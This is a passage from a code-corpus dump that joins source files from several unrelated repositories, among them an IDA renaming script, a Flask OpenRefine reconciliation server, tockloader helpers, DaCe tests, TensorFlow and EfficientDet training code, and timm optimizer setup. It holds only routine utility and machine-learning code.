import os
from util import config
csv_path = config.get_functions_csv_path()
def can_overwrite_name(addr: int, new_name: str):
if not new_name or new_name.startswith(("sub_", "nullsub_", "j_")):
return False
old_name: str = idc.get_name(addr)
# If we don't have an existing name, then the function can always be renamed.
if not old_name:
return True
# Auto-generated names can be overwritten.
if old_name.startswith(("sub_", "nullsub_", "j_")):
return True
# If the existing name is mangled, then it probably came from the function list CSV
# so it can be overwritten.
if old_name.startswith("_Z"):
return True
# Prefer mangled names to temporary names.
if new_name.startswith("_Z"):
return True
# Otherwise, we return false to avoid losing temporary names.
return False
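# Assumed CSV layout (from the function list this tool consumes): column 0 holds
# the address in hex and column 3 the target name; other columns are ignored here.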
with open(csv_path, "r") as f:
reader = csv.reader(f)
# Skip headers
next(reader)
for fn in reader:
addr = int(fn[0], 16)
name = fn[3]
if can_overwrite_name(addr, name):
idc.set_name(addr, name, idc.SN_CHECK | idc.SN_NOWARN)
``` |
{
"source": "1-Byte/csv-reconcile",
"score": 2
} |
#### File: csv-reconcile/csv_reconcile/__init__.py
```python
from flask import Flask, request, jsonify
from flask_cors import cross_origin
from .score import processQueryBatch
from .extend import getCSVCols, processDataExtensionBatch
from . import initdb
from . import default_settings
from . import scorer
import json
import os.path
from contextlib import contextmanager
import time
import click
try:
from importlib import metadata
except:
import importlib_metadata as metadata
__version__ = '0.2.1'
#------------------------------------------------------------------
# Implement reconciliation API
# [[https://reconciliation-api.github.io/specs/latest/]]
#------------------------------------------------------------------
@contextmanager
def Timer():
t = time.perf_counter()
print("start timer", flush=True)
yield
elapsed = time.perf_counter() - t
print("Elapsed: %s" % (elapsed,))
# Default manifest. Can be overriden/updated in configuration
MANIFEST = {
"versions": ["0.1"],
"name": "CSV Reconcile",
"identifierSpace": "http://localhost/csv_reconcile/ids",
"schemaSpace": "http://localhost/csv_reconcile/schema",
"extend": {
"propose_properties": {
"service_url": "http://localhost:5000",
"service_path": "/properties"
}
}
}
def create_app(setup=None, config=None, instance_path=None):
app = Flask("csv-reconcile", instance_path=instance_path)
# Could make dbname configurable
# possibly better to roll THRESHOLD and LIMIT into one config called LIMITS
app.config.from_object(default_settings)
if config:
app.config.from_pyfile(config)
app.config.from_mapping(**setup)
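    # Config precedence: package defaults first, then the optional config file,
    # then the values derived from the command line (applied last, so they win).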
scoreOptions = app.config['SCOREOPTIONS']
scorer.processScoreOptions(scoreOptions)
if 'MANIFEST' in app.config:
MANIFEST.update(app.config['MANIFEST'])
loglevel = app.config['LOGLEVEL']
if loglevel:
app.logger.setLevel(loglevel)
try:
os.makedirs(app.instance_path)
except OSError:
pass
@app.before_request
def before():
app.logger.debug(request.method)
app.logger.debug(request.headers)
@app.after_request
def after(response):
app.logger.debug(response.headers)
return response
@app.route('/reconcile', methods=['POST', 'GET'])
@cross_origin()
def acceptQuery():
threshold = app.config.get('THRESHOLD', None)
limit = app.config.get('LIMIT', None)
scoreOptions = app.config['SCOREOPTIONS']
queries = request.form.get('queries')
extend = request.form.get('extend')
if queries:
queryBatch = json.loads(queries)
app.logger.info(queryBatch)
with Timer():
ret = processQueryBatch(queryBatch,
limit=limit,
threshold=threshold,
**scoreOptions)
app.logger.info(ret)
return ret
elif extend:
extendBatch = json.loads(extend)
app.logger.info(extendBatch)
with Timer():
ret = processDataExtensionBatch(extendBatch)
app.logger.info(ret)
return ret
else:
return MANIFEST
# FIX FIX FIX... Not needed in OpenRefine 3.5
# [[https://github.com/OpenRefine/OpenRefine/issues/3672]]
def jsonpify(obj):
"""
Like jsonify but wraps result in a JSONP callback if a 'callback'
query param is supplied.
"""
try:
callback = request.args['callback']
response = app.make_response("%s(%s)" % (callback, json.dumps(obj)))
response.mimetype = "text/javascript"
return response
except KeyError:
return jsonify(obj)
@app.route('/properties', methods=['POST', 'GET'])
@cross_origin()
def acceptPropertyRequest():
# query string arg
propType = request.args.get('type')
# Type irrelevant, return all columns
if propType != None:
cols = getCSVCols()
ret = dict(properties=[{
'id': colname,
'name': name
} for name, colname in cols])
return jsonpify(ret)
        # unprocessable request
return app
def pickScorer(plugin):
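    # Scorer plugins advertise themselves under the 'csv_reconcile.scorers'
    # entry-point group; importlib.metadata discovers them at runtime, so no
    # plugin has to be imported by name here.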
eps = metadata.entry_points()['csv_reconcile.scorers']
if len(eps) == 0:
raise RuntimeError("Please install a \"csv_reconcile.scorers\" plugin")
elif plugin:
for ep in eps:
if ep.name == plugin:
return ep
else:
raise RuntimeError(
"Please install %s \"csv_reconcile.scorers\" plugin" %
(plugin,))
elif len(eps) == 1:
return next(iter(eps))
# print out options
print(
"There are several scorers available. Please choose one of the following with the --scorer option."
)
for ep in eps:
print(" %s" % (ep.name,))
return None
@click.command()
@click.option('--config', help='config file')
@click.option('--scorer', 'scorerOption', help='scoring plugin to use')
@click.option('--init-db', is_flag=True, help='initialize the db')
@click.argument('csvfile')
@click.argument('idcol')
@click.argument('namecol')
def main(config, scorerOption, init_db, csvfile, idcol, namecol):
ep = pickScorer(scorerOption)
if ep:
ep.load()
else:
return
app = create_app(dict(CSVFILE=csvfile, CSVCOLS=(idcol, namecol)), config)
if init_db:
with app.app_context():
initdb.init_db()
click.echo('Initialized the database.')
from werkzeug.serving import WSGIRequestHandler
WSGIRequestHandler.protocol_version = "HTTP/1.1"
app.run()
```
#### File: csv-reconcile/csv_reconcile/scorer.py
```python
def register(func):
'''
Decorator for replacing functions in this module
'''
glbls = globals()
glbls[func.__name__] = func
return func
def getNormalizedFields():
'''List of fields generated from reconciled column for the match calculation'''
raise RuntimeError('getNormalizedFields() -> tuple must be implemented')
def processScoreOptions(options):
'''Optionally modify configuration options passed in'''
def scoreMatch(left, right, **scoreOptions):
'''Score fuzzy match score between left and right'''
raise RuntimeError('scoreMatch(left,right) -> float must be implemented')
def normalizeWord(word, **scoreOptions):
'''
Preprocess column being reconciled for the match calculation.
Return a tuple with the same number of elements as returned by getNormalizedFields()
'''
raise RuntimeError(
'normalizeWord(word, **options) -> tuple must be implemented')
def normalizeRow(word, row, **scoreOptions):
'''
Preprocess column being reconciled against for the match calculation.
Return a tuple with the same number of elements as returned by getNormalizedFields()
Defaults to using the same normalization as normalizeWord().
'''
return normalizeWord(word, **scoreOptions)
def valid(normalizedFields):
'''Optionally validate column before performing match calculation'''
return True
``` |
{
"source": "1c3t3a/tockloader",
"score": 3
} |
#### File: tockloader/tockloader/helpers.py
```python
import argparse
import sys
import colorama
def set_terminal_title (title):
if sys.stdout.isatty():
sys.stdout.write(colorama.ansi.set_title(title))
sys.stdout.flush()
def set_terminal_title_from_port_info (info):
'''
Set a terminal title from a `pyserial` object.
'''
extras = ['Tockloader']
if info.manufacturer and info.manufacturer != 'n/a':
extras.append(info.manufacturer)
if info.name and info.name != 'n/a':
extras.append(info.name)
if info.description and info.description != 'n/a':
extras.append(info.description)
#if info.hwid and info.hwid != 'n/a':
# extras.append(info.hwid)
if info.product and info.product != 'n/a':
if info.product != info.description:
extras.append(info.product)
title = ' : '.join(extras)
set_terminal_title(title)
def set_terminal_title_from_port (port):
'''
Set the title of the user's terminal for Tockloader.
'''
set_terminal_title('Tockloader : {}'.format(port))
def menu (options, *, return_type, default_index=0, prompt='Which option? ', title=''):
'''
Present a menu of choices to a user
	`options` should be a list-like object whose iterated objects can be coerced
into strings.
`return_type` must be set to one of
- "index" - for the index into the options array
- "value" - for the option value chosen
`default_index` is the index to present as the default value (what happens
if the user simply presses enter). Passing `None` disables default
selection.
'''
prompt_to_show = prompt
print(title)
for i,opt in enumerate(options):
print('[{}]\t{}'.format(i, opt))
if default_index is not None:
prompt_to_show += '[{}] '.format(default_index)
print()
resp = input(prompt_to_show)
if resp == '':
resp = default_index
else:
try:
resp = int(resp)
if resp < 0 or resp >= len(options):
raise ValueError
except:
return menu(options,
return_type=return_type,
default_index=default_index,
prompt=prompt,
title=title)
if return_type == 'index':
return resp
elif return_type == 'value':
return options[resp]
else:
raise NotImplementedError('Menu caller asked for bad return_type')
def plural (value):
'''
Return '' or 's' based on whether the `value` means a string should have
a plural word.
`value` can be a list or a number. If the number or the length of the list
is 1, then '' will be returned. Otherwise 's'.
'''
try:
value = len(value)
except:
pass
if value == 1:
return ''
else:
return 's'
def text_in_box (string, box_width):
'''
Return a string like:
```
┌───────────────┐
│ str │
└───────────────┘
```
'''
string_len = box_width - 4
truncated_str = (string[:string_len-3] + '...') if len(string) > string_len else string
out = '┌{}┐\n'.format('─'*(box_width-2))
	out += '│ {} │\n'.format(truncated_str.ljust(string_len))
out += '└{}┘'.format('─'*(box_width-2))
return out
class ListToDictAction(argparse.Action):
'''
`argparse` action to convert `[['key', 'val'], ['key2', 'val2']]` to
`{'key': 'val', 'key2': 'val2'}`.
This will also do the following conversions:
- `[[]]` -> `{}`
- `[['k': 'v'], []]` -> `{'k': 'v'}`
- `[['k': 'v'], ['']]` -> `{'k': 'v'}`
- `[['k': 'v'], ['a']]` -> `{'k': 'v', 'a': ''}`
'''
def __call__(self, parser, namespace, values, option_string=None):
# Remove any empty values.
values = list(filter(None, values))
values = list(filter(lambda x: len(x[0]), values))
# Correct any bad values.
		for item in values:
			if len(item) == 1:
				item.append('')
			elif len(item) > 2:
				# Slice-assign so the list is trimmed in place; rebinding the
				# loop variable would leave the original value untouched.
				item[:] = item[0:2]
# Convert to dict and set as argument attribute.
setattr(namespace, self.dest, dict(values))
``` |
{
"source": "1C4nfaN/dace",
"score": 2
} |
#### File: dace/tests/symbol_in_tasklet_test.py
```python
import dace
import numpy as np
value = dace.symbol('value', dtype=dace.float32)
@dace.program
def symintasklet_numpy(out: dace.float32[1]):
out[0] = value
@dace.program
def symintasklet_explicit(out: dace.float32[1]):
with dace.tasklet:
o = value
o >> out[0]
def test_numpy():
out = np.zeros(1).astype(np.float32)
symintasklet_numpy(out, value=np.float32(1.5))
assert out[0] == np.float32(1.5)
def test_explicit():
out = np.zeros(1).astype(np.float32)
symintasklet_explicit(out, value=np.float32(1.5))
assert out[0] == np.float32(1.5)
if __name__ == '__main__':
test_numpy()
test_explicit()
```
#### File: transformations/subgraph_fusion/create_out_transient_test.py
```python
import dace
from dace.transformation.subgraph import MultiExpansion
from dace.transformation.subgraph import SubgraphFusion
from dace.transformation.subgraph import ReduceExpansion
import dace.transformation.subgraph.helpers as helpers
import dace.sdfg.nodes as nodes
import numpy as np
from dace.sdfg.graph import SubgraphView
from dace.transformation.interstate import StateFusion
from typing import List, Union
import sys
def fusion(sdfg: dace.SDFG,
graph: dace.SDFGState,
subgraph: Union[SubgraphView, List[SubgraphView]] = None,
**kwargs):
subgraph = graph if not subgraph else subgraph
if not isinstance(subgraph, List):
subgraph = [subgraph]
map_fusion = SubgraphFusion()
for (property, val) in kwargs.items():
setattr(map_fusion, property, val)
for sg in subgraph:
map_entries = helpers.get_highest_scope_maps(sdfg, graph, sg)
# remove map_entries and their corresponding exits from the subgraph
# already before applying transformation
if isinstance(sg, SubgraphView):
for map_entry in map_entries:
sg.nodes().remove(map_entry)
if graph.exit_node(map_entry) in sg.nodes():
sg.nodes().remove(graph.exit_node(map_entry))
print(f"Subgraph Fusion on map entries {map_entries}")
map_fusion.fuse(sdfg, graph, map_entries)
if isinstance(sg, SubgraphView):
sg.nodes().append(map_fusion._global_map_entry)
N, M, O = [dace.symbol(s) for s in ['N', 'M', 'O']]
N.set(50)
M.set(60)
O.set(70)
@dace.program
def test_program(A: dace.float64[M, N], B: dace.float64[M, N], C: dace.float64[M, N]):
for i, j in dace.map[0:M, 0:N]:
with dace.tasklet:
in1 << A[i, j]
out1 >> A[i, j]
out1 = in1 + 1.0
with dace.tasklet:
in1 << A[:]
out1 >> B[:]
out1 = in1
for i, j in dace.map[0:M, 0:N]:
with dace.tasklet:
in1 << A[i, j]
out >> A[i, j]
out = in1 + 2.0
with dace.tasklet:
in1 << A[:]
out1 >> C[:]
out1 = in1
def test_quantitatively(sdfg, graph):
A = np.random.rand(M.get(), N.get()).astype(np.float64)
B1 = np.zeros(shape=[M.get(), N.get()], dtype=np.float64)
C1 = np.zeros(shape=[M.get(), N.get()], dtype=np.float64)
B2 = np.zeros(shape=[M.get(), N.get()], dtype=np.float64)
C2 = np.zeros(shape=[M.get(), N.get()], dtype=np.float64)
csdfg = sdfg.compile()
csdfg(A=A, B=B1, C=C1, N=N, M=M)
fusion(sdfg, graph)
csdfg = sdfg.compile()
csdfg(A=A, B=B2, C=C2, N=N, M=M)
assert np.allclose(B1, B2)
assert np.allclose(C1, C2)
def test_out_transient():
sdfg = test_program.to_sdfg()
sdfg.apply_transformations_repeated(StateFusion)
graph = sdfg.nodes()[0]
test_quantitatively(sdfg, graph)
if __name__ == "__main__":
test_out_transient()
``` |
{
"source": "1carlosd1/daa_2021_1",
"score": 3
} |
#### File: daa_2021_1/Tarea10/RecorridoArbol.py
```python
class NodoArbol:
def __init__(self,value,left=None,rigth=None):
self.data=value
self.left=left
self.rigth=rigth
self.ban=0
def recorrido(arb):
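    # Iterative DFS: 'mov' records the L/R turns from the root to the current
    # node and 'ban' marks visited nodes; each leaf is appended to lis1 with its
    # depth (len(mov)) in lis2, and the deepest leaves are printed at the end.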
mov=[]
bandera=0
    lis1=[] # leaf nodes
    lis2=[] # levels
while bandera==0:
bandera2=0
aux=arb
for i in mov:
if i=="L":
aux=aux.left
if i=="R":
aux=aux.rigth
if len(mov)==0 and arb.left.ban==1 and arb.rigth.ban==1:
bandera=1
if len(mov)==0 and arb.left==None and arb.rigth==None:
bandera=1
if aux.left!= None and aux.left.ban==0 and bandera2==0:
aux=aux.left
aux.ban=1
mov.append("L")
bandera2=1
if aux.rigth!=None and aux.rigth.ban==0 and bandera2==0:
aux=aux.rigth
aux.ban=1
mov.append("R")
bandera2=1
if aux.rigth==None and aux.left==None:
lis1.append(aux.data)
lis2.append(len(mov))
mov.pop()
if aux.left!=None and aux.rigth!=None and aux!=arb:
if aux.left.ban==1 and aux.rigth.ban==1:
mov.pop()
if aux.rigth!=None:
if aux.left==None and aux.rigth.ban==1:
mov.pop()
if aux.left!=None:
if aux.left.ban==1 and aux.rigth==None:
mov.pop()
    for i in range(len(lis2)):
        for j in range(len(lis2)-1):
if lis2[j]>lis2[j+1]:
aux=lis1[j]
lis1[j]=lis1[j+1]
lis1[j+1]=aux
aux2=lis2[j]
lis2[j]=lis2[j+1]
lis2[j+1]=aux2
print("----------------------------------------------------------------")
for i in range(len(lis2)):
if lis2[i]==lis2[len(lis2)-1]:
print("Nodo",lis1[i],"en el nivel",lis2[i])
print("----------------------------------------------------------------")
print("***********ArboL Uno**********")
arbol=NodoArbol("4",NodoArbol("2",NodoArbol("1"),NodoArbol("3")),NodoArbol("8",NodoArbol("9")))
recorrido(arbol)
print("**********Arbol dos **********")
arbol2=NodoArbol("A",NodoArbol("D",NodoArbol("L"),NodoArbol("K")),NodoArbol("M",NodoArbol("I"),NodoArbol("E")))
recorrido(arbol2)
print("**********Arbol Tres**********")
arbol3=NodoArbol("2",NodoArbol("7",NodoArbol("2"),NodoArbol("6",NodoArbol("5"),NodoArbol("11"))),NodoArbol("5",None,NodoArbol("9",NodoArbol("4"))))
recorrido(arbol3)
print("**********Arbol Cuatro**********")
arbol4=NodoArbol("55",NodoArbol("53",NodoArbol("48",NodoArbol(None,NodoArbol("51"))),NodoArbol("54")),NodoArbol("59",NodoArbol("56",NodoArbol(None,NodoArbol("57"))),NodoArbol("63",NodoArbol("61"),NodoArbol("70"))))
recorrido(arbol4)
``` |
{
"source": "1carvercoleman/column_carver",
"score": 3
} |
#### File: 1carvercoleman/column_carver/column_carver_pixeler.py
```python
import os
import skimage
import numpy as np
import cv2
from glob import glob
import matplotlib.pyplot as plt
import pandas as pd
DEBUG = True
os.chdir("PATH_TO_IMAGES")
path = ("PATH_TO_OUTPUT_FOLDER")
# Calculates mean pixels on each verticle
def column_cropper(img):
IMG_WIDTH = img.shape[:2][1]
IMG_HEIGHT = img.shape[:2][0]
col_mean = []
crops = []
final_crops = []
cut_begin = 'y'
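    # A column whose mean pixel value sits near 255 is almost entirely white,
    # i.e. a gutter between text columns; 250 below is the empirical threshold
    # this script uses to decide where a text column starts and ends.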
for i in range(IMG_WIDTH):
intermediate_sum = 0
for j in range(IMG_HEIGHT):
intermediate_sum = intermediate_sum + img[j,i][0]
col_mean.append(intermediate_sum / IMG_HEIGHT)
if i > 3 and col_mean[i - 5] > 250.0 and max(col_mean[-4:]) < 250 and cut_begin == 'y':
crops.append(i - 5)
cut_begin = 'n'
if i > 3 and col_mean[i] - col_mean[i - 3] > 20 and cut_begin == 'n' and col_mean[i] > 250.0:
crops.append(i)
cut_begin = 'y'
final_crops.append(crops)
crops = []
return (final_crops, col_mean)
# Plots time series of panda data frame
def plot_df(df, x, y, title="", xlabel='Pixel Index', ylabel='Pixel Value', dpi=100):
plt.figure(figsize=(16,5), dpi=dpi)
plt.plot(x, y, color='tab:red')
plt.gca().set(title=title, xlabel=xlabel, ylabel=ylabel)
plt.show()
# __main__
for image_file in glob(f'*.jpg'):
print(image_file)
gray = cv2.imread(image_file)
thresh, gray2 = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)
final_crops, col_mean = column_cropper(gray2)
final_crops = np.asarray(final_crops)
for i in range(len(final_crops)):
if i == (len(final_crops) - 1):
buffer_right = -5
else:
buffer_right = 7
cropped = gray2[:,final_crops[i][0]:final_crops[i][1] - buffer_right]
skimage.io.imsave(path + image_file[:-4] + '_col_' + str(i + 1) + '.jpg', cropped)
if DEBUG:
#Plots pixels across image
df = pd.DataFrame(col_mean)
df.index.name = 'Pixel Index'
df.reset_index(inplace=True)
df.columns = ['Pixel Index', 'Pixel Value']
plot_df(df, df['Pixel Index'], df['Pixel Value'])
``` |
{
"source": "1cgeo/proxySetter",
"score": 2
} |
#### File: 1cgeo/proxySetter/main.py
```python
import os, sys
sys.path.append(os.path.abspath(os.path.dirname(__file__)))
from controllers.proxyCtrl import ProxyCtrl
class Main:
def __init__(
self,
iface,
proxyCtrl=ProxyCtrl()
):
self.iface = iface
self.proxyCtrl = proxyCtrl
self.proxyComboBox = None
def initGui(self):
self.proxyComboBox = self.iface.addToolBarWidget(
self.proxyCtrl.getProxyComboWidget()
)
def unload(self):
self.iface.removeToolBarIcon(self.proxyComboBox) if self.proxyComboBox else ''
        del self.proxyComboBox
``` |
{
"source": "1chimaruGin/custom_train_loop",
"score": 3
} |
#### File: custom_train_loop/custom_train_loop/custom_training_loop.py
```python
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras.datasets import mnist
import tensorflow_datasets as tfds
physical_devices = tf.config.experimental.list_physical_devices("GPU")
tf.config.experimental.set_memory_growth(physical_devices[0], True)
(ds_train, ds_test), ds_info = tfds.load(
"mnist",
split=["train", "test"],
shuffle_files=True,
as_supervised=True,
with_info=True,
)
def normalized(image, label):
return tf.cast(image, tf.float32) / 255.0, label
def train(ds_train, ds_test):
AUTOTUNE = tf.data.experimental.AUTOTUNE
BATCH_SIZE = 128
ds_train = (
ds_train.map(normalized, num_parallel_calls=AUTOTUNE)
.cache()
.shuffle(ds_info.splits["train"].num_examples)
)
ds_train = ds_train.batch(BATCH_SIZE)
ds_train = ds_train.prefetch(AUTOTUNE)
ds_test = ds_test.map(normalized, num_parallel_calls=AUTOTUNE)
ds_test = ds_test.batch(BATCH_SIZE)
ds_test = ds_test.prefetch(AUTOTUNE)
model = keras.Sequential(
[
layers.Input((28, 28, 1)),
layers.Conv2D(32, 3, activation="relu"),
layers.Flatten(),
layers.Dense(10, activation="softmax"),
]
)
num_epochs = 5
optimizer = keras.optimizers.Adam()
loss_fn = keras.losses.SparseCategoricalCrossentropy()
acc_metric = keras.metrics.SparseCategoricalAccuracy()
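    # Custom training loop: instead of model.fit(), each batch is run forward
    # under a GradientTape, gradients of the loss are taken w.r.t. the trainable
    # weights, and the optimizer applies them explicitly.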
for epoch in range(num_epochs):
print(f"\nStart Training Epoch: {epoch}")
for batch_idx, (x_batch, y_batch) in enumerate(ds_train):
with tf.GradientTape() as tape:
y_pred = model(x_batch, training=True)
loss = loss_fn(y_batch, y_pred)
gradients = tape.gradient(loss, model.trainable_weights)
optimizer.apply_gradients(zip(gradients, model.trainable_weights))
acc_metric.update_state(y_batch, y_pred)
train_acc = acc_metric.result()
print(f"Accuracy over epoch {train_acc}")
acc_metric.reset_states()
for batch_idx, (x_batch, y_batch) in enumerate(ds_test):
y_pred = model(x_batch, training=False)
acc_metric.update_state(y_batch, y_pred)
test_acc = acc_metric.result()
print(f"Accuracy over test set: {test_acc}")
acc_metric.reset_states()
if __name__ == '__main__':
train(ds_train, ds_test)
``` |
{
"source": "1chimaruGin/EfficientDet",
"score": 2
} |
#### File: EfficientDet/data/dataset.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch.utils.data as data
import os
import cv2
import random
import torch
import numpy as np
from PIL import Image
from pycocotools.coco import COCO
class CocoDetection(data.Dataset):
"""`MS Coco Detection <http://mscoco.org/dataset/#detections-challenge2016>`_ Dataset.
Args:
root (string): Root directory where images are downloaded to.
ann_file (string): Path to json annotation file.
transform (callable, optional): A function/transform that takes in an PIL image
and returns a transformed version. E.g, ``transforms.ToTensor``
"""
def __init__(self, root, ann_file, transform=None):
super(CocoDetection, self).__init__()
if isinstance(root, torch._six.string_classes):
root = os.path.expanduser(root)
self.root = root
self.transform = transform
self.yxyx = True # expected for TF model, most PT are xyxy
self.include_masks = False
self.include_bboxes_ignore = False
self.has_annotations = 'image_info' not in ann_file
self.coco = None
self.cat_ids = []
self.cat_to_label = dict()
self.img_ids = []
self.img_ids_invalid = []
self.img_infos = []
self._load_annotations(ann_file)
def _load_annotations(self, ann_file):
assert self.coco is None
self.coco = COCO(ann_file)
self.cat_ids = self.coco.getCatIds()
img_ids_with_ann = set(_['image_id'] for _ in self.coco.anns.values())
for img_id in sorted(self.coco.imgs.keys()):
info = self.coco.loadImgs([img_id])[0]
valid_annotation = not self.has_annotations or img_id in img_ids_with_ann
if valid_annotation and min(info['width'], info['height']) >= 32:
self.img_ids.append(img_id)
self.img_infos.append(info)
else:
self.img_ids_invalid.append(img_id)
def _parse_img_ann(self, img_id, img_info):
ann_ids = self.coco.getAnnIds(imgIds=[img_id])
ann_info = self.coco.loadAnns(ann_ids)
bboxes = []
bboxes_ignore = []
cls = []
for i, ann in enumerate(ann_info):
if ann.get('ignore', False):
continue
x1, y1, w, h = ann['bbox']
if self.include_masks and ann['area'] <= 0:
continue
if w < 1 or h < 1:
continue
# To subtract 1 or not, TF doesn't appear to do this so will keep it out for now.
if self.yxyx:
#bbox = [y1, x1, y1 + h - 1, x1 + w - 1]
bbox = [y1, x1, y1 + h, x1 + w]
else:
#bbox = [x1, y1, x1 + w - 1, y1 + h - 1]
bbox = [x1, y1, x1 + w, y1 + h]
if ann.get('iscrowd', False):
if self.include_bboxes_ignore:
bboxes_ignore.append(bbox)
else:
bboxes.append(bbox)
cls.append(self.cat_to_label[ann['category_id']] if self.cat_to_label else ann['category_id'])
if bboxes:
bboxes = np.array(bboxes, dtype=np.float32)
cls = np.array(cls, dtype=np.int64)
else:
bboxes = np.zeros((0, 4), dtype=np.float32)
cls = np.array([], dtype=np.int64)
if self.include_bboxes_ignore:
if bboxes_ignore:
bboxes_ignore = np.array(bboxes_ignore, dtype=np.float32)
else:
bboxes_ignore = np.zeros((0, 4), dtype=np.float32)
ann = dict(img_id=img_id, bbox=bboxes, cls=cls, img_size=(img_info['width'], img_info['height']))
if self.include_bboxes_ignore:
ann['bbox_ignore'] = bboxes_ignore
return ann
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: Tuple (image, annotations (target)).
"""
img_id = self.img_ids[index]
img_info = self.img_infos[index]
if self.has_annotations:
ann = self._parse_img_ann(img_id, img_info)
else:
ann = dict(img_id=img_id, img_size=(img_info['width'], img_info['height']))
path = img_info['file_name']
img = Image.open(os.path.join(self.root, path)).convert('RGB')
if self.transform is not None:
img, ann = self.transform(img, ann)
return img, ann
def __len__(self):
return len(self.img_ids)
class Custom_Dataset(data.Dataset):
def __init__(self, root, data, image_ids, transform=None, test=False):
self.root = root
self.data = data
self.image_ids = image_ids
self.transform = transform
self.test = test
def _load_data(self, index):
image_id = self.image_ids[index]
image = cv2.imread(f'{self.root}/{image_id}.jpg', cv2.IMREAD_COLOR)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB).astype(np.float32)
image /= 255.0
record = self.data[self.data['image_id'] == image_id]
boxes = record[['x', 'y', 'w', 'h']].values
boxes[:, 2] = boxes[:, 0] + boxes[:, 2]
boxes[:, 3] = boxes[:, 1] + boxes[:, 3]
return image, boxes
def _load_cutmix_data(self, index, imgsize=1024):
w, h = imgsize, imgsize
s = imgsize // 2
xc, yc = [int(random.uniform(imgsize * .25, imgsize * .75)) for _ in range(2)]
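        # CutMix/mosaic-style augmentation: (xc, yc) is a random centre inside
        # the canvas; the current image plus three random ones each fill one
        # quadrant, with (x1a..y2a) the canvas region and (x1b..y2b) the crop
        # taken from the source image.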
indexes = [index] + [random.randint(0, self.image_ids.shape[0] - 1) for _ in range(3)]
result_image = np.full((imgsize, imgsize, 3), 1, dtype=np.float32)
result_boxes = []
for i, index in enumerate(indexes):
image, boxes = self._load_data(index)
if i == 0:
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
result_image[y1a:y2a, x1a:x2a] = image[y1b:y2b, x1b:x2b]
padw = x1a - x1b
padh = y1a - y1b
boxes[:, 0] += padw
boxes[:, 1] += padh
boxes[:, 2] += padw
boxes[:, 3] += padh
result_boxes.append(boxes)
result_boxes = np.concatenate(result_boxes, 0)
np.clip(result_boxes[:, 0:], 0, 2 * s, out=result_boxes[:, 0:])
result_boxes = result_boxes.astype(np.int32)
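        # Clipping to the canvas can collapse boxes that fell outside it; keep
        # only boxes that still have positive area.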
result_boxes = result_boxes[np.where((result_boxes[:, 2] - result_boxes[:, 0]) * (result_boxes[:, 3] - result_boxes[:, 1]) > 0)]
return result_image, result_boxes
def __getitem__(self, index: int):
image_id = self.image_ids[index]
if self.test or random.random() > 0.35:
image, boxes = self._load_data(index)
elif random.random() > 0.5:
image, boxes = self._load_cutmix_data(index)
else:
image, boxes = self._load_cutmix_data(index)
labels = torch.ones((boxes.shape[0]), dtype=torch.int64)
target = {}
target['boxes'] = boxes
target['labels'] = labels
target['image_id'] = torch.tensor(index)
if self.transform:
for i in range(10):
sample = self.transform(**{
'image': image,
'bboxes': target['boxes'],
'labels': labels
})
if len(sample['bboxes']) > 0:
image = sample['image']
target['boxes'] = torch.stack(tuple(map(torch.tensor, zip(*sample['bboxes'])))).permute(1, 0)
target['boxes'][:, [0, 1, 2, 3]] = target['boxes'][:, [1, 0, 3, 2]]
break
return image, target, image_id
def __len__(self) -> int:
return self.image_ids.shape[0]
```
#### File: timm/optim/optim_factory.py
```python
import torch
from torch import optim as optim
from timm.optim import Nadam, RMSpropTF, AdamW, RAdam, NovoGrad, NvNovoGrad, Lookahead, AdamP, SGDP
try:
from apex.optimizers import FusedNovoGrad, FusedAdam, FusedLAMB, FusedSGD
has_apex = True
except ImportError:
has_apex = False
def add_weight_decay(model, weight_decay=1e-5, skip_list=()):
decay = []
no_decay = []
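    # 1-D parameters (biases, BatchNorm/LayerNorm scales) are conventionally
    # exempted from weight decay; everything else goes in the decayed group.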
for name, param in model.named_parameters():
if not param.requires_grad:
continue # frozen weights
if len(param.shape) == 1 or name.endswith(".bias") or name in skip_list:
no_decay.append(param)
else:
decay.append(param)
return [
{'params': no_decay, 'weight_decay': 0.},
{'params': decay, 'weight_decay': weight_decay}]
def create_optimizer(args, model, filter_bias_and_bn=True):
opt_lower = args.opt.lower()
weight_decay = args.weight_decay
if 'adamw' in opt_lower or 'radam' in opt_lower:
# Compensate for the way current AdamW and RAdam optimizers apply LR to the weight-decay
# I don't believe they follow the paper or original Torch7 impl which schedules weight
# decay based on the ratio of current_lr/initial_lr
weight_decay /= args.lr
if weight_decay and filter_bias_and_bn:
parameters = add_weight_decay(model, weight_decay)
weight_decay = 0.
else:
parameters = model.parameters()
    if 'fused' in opt_lower:
        assert has_apex and torch.cuda.is_available(), 'APEX and CUDA required for fused optimizers'
    opt_split = opt_lower.split('_')
    opt_lower = opt_split[-1]
if opt_lower == 'sgd' or opt_lower == 'nesterov':
optimizer = optim.SGD(
parameters, lr=args.lr, momentum=args.momentum, weight_decay=weight_decay, nesterov=True)
elif opt_lower == 'momentum':
optimizer = optim.SGD(
parameters, lr=args.lr, momentum=args.momentum, weight_decay=weight_decay, nesterov=False)
elif opt_lower == 'adam':
optimizer = optim.Adam(
parameters, lr=args.lr, weight_decay=weight_decay, eps=args.opt_eps)
elif opt_lower == 'adamw':
optimizer = AdamW(
parameters, lr=args.lr, weight_decay=weight_decay, eps=args.opt_eps)
elif opt_lower == 'nadam':
optimizer = Nadam(
parameters, lr=args.lr, weight_decay=weight_decay, eps=args.opt_eps)
elif opt_lower == 'radam':
optimizer = RAdam(
parameters, lr=args.lr, weight_decay=weight_decay, eps=args.opt_eps)
elif opt_lower == 'adamp':
optimizer = AdamP(
